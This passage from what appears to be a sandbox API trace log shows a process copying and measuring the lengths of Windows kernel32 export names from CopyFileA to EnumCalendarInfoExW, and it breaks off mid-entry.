lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0071.124] lstrlenA (lpString="COPYFILEA") returned 9 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0071.124] lstrlenA (lpString="COPYFILEEXA") returned 11 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0071.124] lstrlenA (lpString="COPYFILEEXW") returned 11 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0071.124] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0071.124] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0071.124] lstrlenA (lpString="COPYFILEW") returned 9 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0071.124] lstrlenA (lpString="COPYLZFILE") returned 10 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0071.124] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0071.124] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0071.124] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0071.124] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0071.124] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0071.124] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0071.124] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0071.124] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0071.124] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0071.124] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0071.124] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0071.124] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0071.125] lstrlenA (lpString="CREATEEVENTA") returned 12 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0071.125] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0071.125] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0071.125] lstrlenA (lpString="CREATEEVENTW") returned 12 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0071.125] lstrlenA (lpString="CREATEFIBER") returned 11 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0071.125] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0071.125] lstrlenA (lpString="CREATEFILEA") returned 11 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0071.125] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0071.125] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0071.125] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0071.125] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0071.125] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0071.125] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0071.125] lstrlenA (lpString="CREATEFILEW") returned 11 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0071.125] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0071.125] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0071.125] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0071.125] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0071.125] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0071.125] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0071.126] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0071.126] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0071.126] lstrlenA (lpString="CREATEJOBSET") returned 12 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0071.126] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0071.126] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0071.126] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0071.126] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0071.126] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0071.126] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0071.126] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0071.126] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0071.126] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0071.126] lstrlenA (lpString="CREATEPIPE") returned 10 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0071.126] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0071.126] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0071.126] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0071.126] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0071.126] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0071.126] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0071.127] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0071.127] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0071.127] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0071.127] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0071.127] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0071.127] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0071.127] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0071.127] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0071.127] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0071.127] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0071.127] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0071.127] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0071.127] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0071.127] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0071.127] lstrlenA (lpString="CREATETHREAD") returned 12 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0071.127] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0071.127] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0071.127] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0071.127] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0071.127] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0071.128] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0071.128] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0071.128] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0071.128] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0071.128] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0071.128] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0071.128] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0071.128] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0071.128] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0071.128] lstrlenA (lpString="CTRLROUTINE") returned 11 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0071.128] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0071.128] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0071.128] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0071.128] lstrlenA (lpString="DEBUGBREAK") returned 10 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0071.128] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0071.128] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0071.128] lstrlenA (lpString="DECODEPOINTER") returned 13 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0071.128] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0071.128] lstrcpyA (in: lpString1=0x410ec90, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0071.129] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0071.129] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0071.129] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0071.129] lstrlenA (lpString="DELETEATOM") returned 10 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0071.129] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0071.129] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0071.129] lstrlenA (lpString="DELETEFIBER") returned 11 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0071.129] lstrlenA (lpString="DELETEFILEA") returned 11 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0071.129] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0071.129] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0071.129] lstrlenA (lpString="DELETEFILEW") returned 11 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0071.129] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0071.129] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0071.129] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0071.129] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0071.129] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0071.129] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0071.129] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0071.129] lstrcpyA (in: lpString1=0x410ec90, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0071.129] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0071.130] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0071.130] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0071.130] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0071.130] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0071.130] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0071.130] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0071.130] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0071.130] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0071.130] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0071.130] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0071.130] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0071.130] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0071.130] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0071.130] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0071.130] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0071.130] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0071.130] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0071.130] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0071.130] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0071.131] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0071.131] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0071.131] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0071.131] lstrcpyA (in: lpString1=0x410ec90, 